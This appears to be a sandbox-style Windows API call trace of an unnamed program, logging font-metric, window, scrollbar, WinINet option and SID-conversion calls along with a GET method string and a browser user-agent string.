[0180.525] CreateFontIndirectA (lplf=0x6f39c) returned 0x450a0878
[0180.525] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.525] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f41c | out: lptm=0x6f41c) returned 1
[0180.525] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.525] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.525] GetSystemMetrics (nIndex=6) returned 1
[0180.526] VirtualAlloc (lpAddress=0x28f4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x28f4000
[0180.526] GetDC (hWnd=0x0) returned 0xed010836
[0180.526] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f3e4 | out: lptm=0x6f3e4) returned 1
[0180.526] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.526] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f41c | out: lptm=0x6f41c) returned 1
[0180.526] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.526] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.526] GetSystemMetrics (nIndex=6) returned 1
[0180.527] GetDC (hWnd=0x0) returned 0xed010836
[0180.527] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f3e4 | out: lptm=0x6f3e4) returned 1
[0180.527] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.527] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f41c | out: lptm=0x6f41c) returned 1
[0180.527] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.527] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.527] GetSystemMetrics (nIndex=6) returned 1
[0180.527] GetDC (hWnd=0x0) returned 0xed010836
[0180.527] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f3e4 | out: lptm=0x6f3e4) returned 1
[0180.527] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.527] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f41c | out: lptm=0x6f41c) returned 1
[0180.527] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.527] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.527] GetSystemMetrics (nIndex=6) returned 1
[0180.528] GetDC (hWnd=0x0) returned 0xed010836
[0180.528] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f3f8 | out: lptm=0x6f3f8) returned 1
[0180.528] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.528] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f430 | out: lptm=0x6f430) returned 1
[0180.528] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.528] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.528] GetSystemMetrics (nIndex=6) returned 1
[0180.528] GetDC (hWnd=0x0) returned 0xed010836
[0180.528] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f0fc | out: lptm=0x6f0fc) returned 1
[0180.528] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.528] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f134 | out: lptm=0x6f134) returned 1
[0180.528] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.528] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.528] GetSystemMetrics (nIndex=6) returned 1
[0180.529] GetDC (hWnd=0x0) returned 0xed010836
[0180.529] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f3f8 | out: lptm=0x6f3f8) returned 1
[0180.529] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.529] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f430 | out: lptm=0x6f430) returned 1
[0180.529] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.529] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.529] GetSystemMetrics (nIndex=6) returned 1
[0180.529] GetDC (hWnd=0x0) returned 0xed010836
[0180.529] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f0fc | out: lptm=0x6f0fc) returned 1
[0180.529] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.529] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f134 | out: lptm=0x6f134) returned 1
[0180.529] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.529] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.529] GetSystemMetrics (nIndex=6) returned 1
[0180.529] GetDC (hWnd=0x0) returned 0xed010836
[0180.529] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f3f8 | out: lptm=0x6f3f8) returned 1
[0180.529] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.529] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f430 | out: lptm=0x6f430) returned 1
[0180.530] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.530] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.530] GetSystemMetrics (nIndex=6) returned 1
[0180.530] GetDC (hWnd=0x0) returned 0xed010836
[0180.530] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f0fc | out: lptm=0x6f0fc) returned 1
[0180.530] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.530] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f134 | out: lptm=0x6f134) returned 1
[0180.530] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.530] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.530] GetSystemMetrics (nIndex=6) returned 1
[0180.530] GetDC (hWnd=0x0) returned 0xed010836
[0180.530] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f3e4 | out: lptm=0x6f3e4) returned 1
[0180.530] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.530] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f41c | out: lptm=0x6f41c) returned 1
[0180.530] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.530] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.530] GetSystemMetrics (nIndex=6) returned 1
[0180.531] GetDC (hWnd=0x0) returned 0xed010836
[0180.531] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f3e4 | out: lptm=0x6f3e4) returned 1
[0180.531] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.531] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f41c | out: lptm=0x6f41c) returned 1
[0180.531] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.531] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.531] GetSystemMetrics (nIndex=6) returned 1
[0180.531] GetDC (hWnd=0x0) returned 0xed010836
[0180.531] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f3f8 | out: lptm=0x6f3f8) returned 1
[0180.531] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.531] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f430 | out: lptm=0x6f430) returned 1
[0180.531] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.531] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.531] GetSystemMetrics (nIndex=6) returned 1
[0180.531] GetDC (hWnd=0x0) returned 0xed010836
[0180.531] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f0fc | out: lptm=0x6f0fc) returned 1
[0180.531] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.531] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f134 | out: lptm=0x6f134) returned 1
[0180.531] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.532] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.532] GetSystemMetrics (nIndex=6) returned 1
[0180.532] GetDC (hWnd=0x0) returned 0xed010836
[0180.532] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f3f8 | out: lptm=0x6f3f8) returned 1
[0180.532] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.532] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f430 | out: lptm=0x6f430) returned 1
[0180.532] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.532] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.532] GetSystemMetrics (nIndex=6) returned 1
[0180.532] GetDC (hWnd=0x0) returned 0xed010836
[0180.532] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f0fc | out: lptm=0x6f0fc) returned 1
[0180.532] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.532] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f134 | out: lptm=0x6f134) returned 1
[0180.532] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.532] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.532] GetSystemMetrics (nIndex=6) returned 1
[0180.533] GetDC (hWnd=0x0) returned 0xed010836
[0180.533] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f3f8 | out: lptm=0x6f3f8) returned 1
[0180.533] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.533] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f430 | out: lptm=0x6f430) returned 1
[0180.533] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.533] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.533] GetSystemMetrics (nIndex=6) returned 1
[0180.533] GetDC (hWnd=0x0) returned 0xed010836
[0180.533] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f0fc | out: lptm=0x6f0fc) returned 1
[0180.533] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.533] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f134 | out: lptm=0x6f134) returned 1
[0180.533] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.533] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.533] GetSystemMetrics (nIndex=6) returned 1
[0180.534] GetDC (hWnd=0x0) returned 0xed010836
[0180.534] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f3f8 | out: lptm=0x6f3f8) returned 1
[0180.534] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.534] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f430 | out: lptm=0x6f430) returned 1
[0180.534] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.534] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.534] GetSystemMetrics (nIndex=6) returned 1
[0180.534] GetDC (hWnd=0x0) returned 0xed010836
[0180.534] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f0fc | out: lptm=0x6f0fc) returned 1
[0180.534] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.534] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f134 | out: lptm=0x6f134) returned 1
[0180.534] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.534] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.534] GetSystemMetrics (nIndex=6) returned 1
[0180.535] GetDC (hWnd=0x0) returned 0xed010836
[0180.535] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f3e4 | out: lptm=0x6f3e4) returned 1
[0180.535] SelectObject (hdc=0xed010836, h=0x450a0878) returned 0x18a002e
[0180.535] GetTextMetricsA (in: hdc=0xed010836, lptm=0x6f41c | out: lptm=0x6f41c) returned 1
[0180.535] SelectObject (hdc=0xed010836, h=0x18a002e) returned 0x450a0878
[0180.535] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.535] GetSystemMetrics (nIndex=6) returned 1
[0180.537] SysReAllocStringLen (in: pbstr=0x28ff388*=0x0, psz="GET", len=0x3 | out: pbstr=0x28ff388*="GET") returned 1
[0180.537] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0180.537] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0180.537] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0180.537] SysReAllocStringLen (in: pbstr=0x28ff388*="GET", psz="GET", len=0x3 | out: pbstr=0x28ff388*="GET") returned 1
[0180.538] SysReAllocStringLen (in: pbstr=0x28ff3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x28ff3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0180.538] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x6f480, lpdwBufferLength=0x6f484 | out: lpBuffer=0x6f480, lpdwBufferLength=0x6f484) returned 1
[0180.581] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x6f480, dwBufferLength=0x4) returned 1
[0180.581] VirtualFree (lpAddress=0x2900000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0180.581] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x28f6490, cbMultiByte=3, lpWideCharStr=0x6e3b8, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0180.581] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0180.582] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0180.582] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0180.582] SysReAllocStringLen (in: pbstr=0x28ff388*="GET", psz="GET", len=0x3 | out: pbstr=0x28ff388*="GET") returned 1
[0180.582] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0180.582] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0180.582] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0180.582] SysReAllocStringLen (in: pbstr=0x28ff388*="GET", psz="GET", len=0x3 | out: pbstr=0x28ff388*="GET") returned 1
[0180.587] GetTextExtentPoint32A (in: hdc=0xed010836, lpString="0", c=1, psizl=0x6f574 | out: psizl=0x6f574) returned 1
[0180.588] IsIconic (hWnd=0x1201a8) returned 0
[0180.588] GetClientRect (in: hWnd=0x1201a8, lpRect=0x6f574 | out: lpRect=0x6f574) returned 1
[0180.588] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.588] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.588] IsIconic (hWnd=0x1201a8) returned 0
[0180.588] GetClientRect (in: hWnd=0x1201a8, lpRect=0x6f4bc | out: lpRect=0x6f4bc) returned 1
[0180.588] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.588] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.588] IsIconic (hWnd=0x1201a8) returned 0
[0180.588] GetClientRect (in: hWnd=0x1201a8, lpRect=0x6f48c | out: lpRect=0x6f48c) returned 1
[0180.588] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.588] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.588] IsIconic (hWnd=0x1201a8) returned 0
[0180.588] GetClientRect (in: hWnd=0x1201a8, lpRect=0x6f48c | out: lpRect=0x6f48c) returned 1
[0180.588] FlatSB_SetScrollProp (param_1=0x1201a8, index=0x200, newValue=0x0, param_4=0) returned 0
[0180.588] GetSysColor (nIndex=20) returned 0xffffff
[0180.588] FlatSB_SetScrollProp (param_1=0x1201a8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0180.588] FlatSB_SetScrollInfo (param_1=0x1201a8, code=0, psi=0x6f4ca, fRedraw=1) returned 0
[0180.588] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.588] IsIconic (hWnd=0x1201a8) returned 0
[0180.588] GetClientRect (in: hWnd=0x1201a8, lpRect=0x6f48c | out: lpRect=0x6f48c) returned 1
[0180.588] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.588] IsIconic (hWnd=0x1201a8) returned 0
[0180.588] GetClientRect (in: hWnd=0x1201a8, lpRect=0x6f48c | out: lpRect=0x6f48c) returned 1
[0180.588] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.588] IsIconic (hWnd=0x1201a8) returned 0
[0180.588] GetClientRect (in: hWnd=0x1201a8, lpRect=0x6f48c | out: lpRect=0x6f48c) returned 1
[0180.588] FlatSB_SetScrollProp (param_1=0x1201a8, index=0x100, newValue=0x0, param_4=0) returned 0
[0180.589] GetSysColor (nIndex=20) returned 0xffffff
[0180.589] FlatSB_SetScrollProp (param_1=0x1201a8, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0180.589] FlatSB_SetScrollInfo (param_1=0x1201a8, code=1, psi=0x6f4ca, fRedraw=1) returned 0
[0180.589] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.589] IsIconic (hWnd=0x1201a8) returned 0
[0180.589] GetClientRect (in: hWnd=0x1201a8, lpRect=0x6f48c | out: lpRect=0x6f48c) returned 1
[0180.589] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.589] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.589] IsIconic (hWnd=0x1201a8) returned 0
[0180.589] GetClientRect (in: hWnd=0x1201a8, lpRect=0x6f4bc | out: lpRect=0x6f4bc) returned 1
[0180.589] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.589] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.589] IsIconic (hWnd=0x1201a8) returned 0
[0180.589] GetClientRect (in: hWnd=0x1201a8, lpRect=0x6f48c | out: lpRect=0x6f48c) returned 1
[0180.589] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.589] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.589] IsIconic (hWnd=0x1201a8) returned 0
[0180.589] GetClientRect (in: hWnd=0x1201a8, lpRect=0x6f48c | out: lpRect=0x6f48c) returned 1
[0180.589] FlatSB_SetScrollProp (param_1=0x1201a8, index=0x200, newValue=0x0, param_4=0) returned 0
[0180.589] GetSysColor (nIndex=20) returned 0xffffff
[0180.589] FlatSB_SetScrollProp (param_1=0x1201a8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0180.589] FlatSB_SetScrollInfo (param_1=0x1201a8, code=0, psi=0x6f4ca, fRedraw=1) returned 0
[0180.590] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.590] IsIconic (hWnd=0x1201a8) returned 0
[0180.590] GetClientRect (in: hWnd=0x1201a8, lpRect=0x6f48c | out: lpRect=0x6f48c) returned 1
[0180.590] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.590] IsIconic (hWnd=0x1201a8) returned 0
[0180.590] GetClientRect (in: hWnd=0x1201a8, lpRect=0x6f48c | out: lpRect=0x6f48c) returned 1
[0180.590] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.590] IsIconic (hWnd=0x1201a8) returned 0
[0180.590] GetClientRect (in: hWnd=0x1201a8, lpRect=0x6f48c | out: lpRect=0x6f48c) returned 1
[0180.590] FlatSB_SetScrollProp (param_1=0x1201a8, index=0x100, newValue=0x0, param_4=0) returned 0
[0180.590] GetSysColor (nIndex=20) returned 0xffffff
[0180.590] FlatSB_SetScrollProp (param_1=0x1201a8, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0180.590] FlatSB_SetScrollInfo (param_1=0x1201a8, code=1, psi=0x6f4ca, fRedraw=1) returned 0
[0180.590] GetWindowLongA (hWnd=0x1201a8, nIndex=-16) returned 116326400
[0180.590] IsIconic (hWnd=0x1201a8) returned 0
[0180.590] GetClientRect (in: hWnd=0x1201a8, lpRect=0x6f48c | out: lpRect=0x6f48c) returned 1
[0180.590] GetCurrentThreadId () returned 0x414
[0180.590] ConvertSidToStringSidA () returned 0x1
[0180.591] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0180.591] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0180.591] LocalFree (hMem=0x216f40) returned 0x0
[0180.591] LocalFree (hMem=0x202f90) returned 0x0
[0180.591] ConvertStringSidToSidA () returned 0x1
[0180.591] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28f2914, pSourceSid=0x202f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x28f2914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0180.591] IsValidSid (pSid=0x28f2914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0180.591] ConvertSidToStringSidA () returned 0x1
[0180.591] LocalFree (hMem=0x216f40) returned 0x0
[0180.591] LocalFree (hMem=0x202f90) returned 0x0
[0180.591] ConvertStringSidToSidA () returned 0x1
[0180.591] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28f702c, pSourceSid=0x202f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x28f702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0180.591] IsValidSid (pSid=0x28f702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0180.591] ConvertSidToStringSidA () returned 0x1
[0180.591] LocalFree (hMem=0x216f40) returned 0x0
[0180.591] LocalFree (hMem=0x202f90) returned 0x0
[0180.591] ConvertStringSidToSidA () returned 0x1
[0180.591] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28ff5a0, pSourceSid=0x202f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x28ff5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0180.591] IsValidSid (pSid=0x28ff5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0180.591] ConvertSidToStringSidA () returned 0x1
[0180.591] LocalFree (hMem=0x216f40) returned 0x0
[0180.591] LocalFree (hMem=0x202f90) returned 0x0
[0180.591] ConvertStringSidToSidA () returned 0x1
[0180.591] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28ff614, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x28ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0180.591] IsValidSid (pSid=0x28ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0180.591] ConvertSidToStringSidA () returned 0x1
[0180.591] LocalFree (hMem=0x216f58) returned 0x0
[0180.591] LocalFree (hMem=0x216f40) returned 0x0
[0180.591] ConvertStringSidToSidA () returned 0x1
[0180.591] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28ff688, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x28ff688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0180.591] IsValidSid (pSid=0x28ff688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0180.591] ConvertSidToStringSidA () returned 0x1
[0180.591] LocalFree (hMem=0x216f58) returned 0x0
[0180.591] LocalFree (hMem=0x216f40) returned 0x0
[0180.592] ConvertStringSidToSidA () returned 0x1
[0180.592] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28ff6fc, pSourceSid=0x216f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x28ff6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0180.592] IsValidSid (pSid=0x28ff6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0180.592] ConvertSidToStringSidA () returned 0x1
[0180.592] LocalFree (hMem=0x20c1c8) returned 0x0
[0180.592] LocalFree (hMem=0x216f58) returned 0x0
[0180.592] ConvertStringSidToSidA () returned 0x1
[0180.592] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28ff770, pSourceSid=0x216f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x28ff770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0180.592] IsValidSid (pSid=0x28ff770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0180.592] ConvertSidToStringSidA () returned 0x1
[0180.592] LocalFree (hMem=0x20c1c8) returned 0x0
[0180.592] LocalFree (hMem=0x216f70) returned 0x0
[0180.592] ConvertStringSidToSidA () returned 0x1
[0180.592] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x28ff7f8, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x28ff7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0180.592] IsValidSid (pSid=0x28ff7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0180.592] ConvertSidToStringSidA () returned 0x1
[0180.592] LocalFree (hMem=0x20c1c8) returned 0x0
[0180.592] LocalFree (hMem=0x216f40) returned 0x0
[0180.592] ConvertStringSidToSidA () returned 0x1
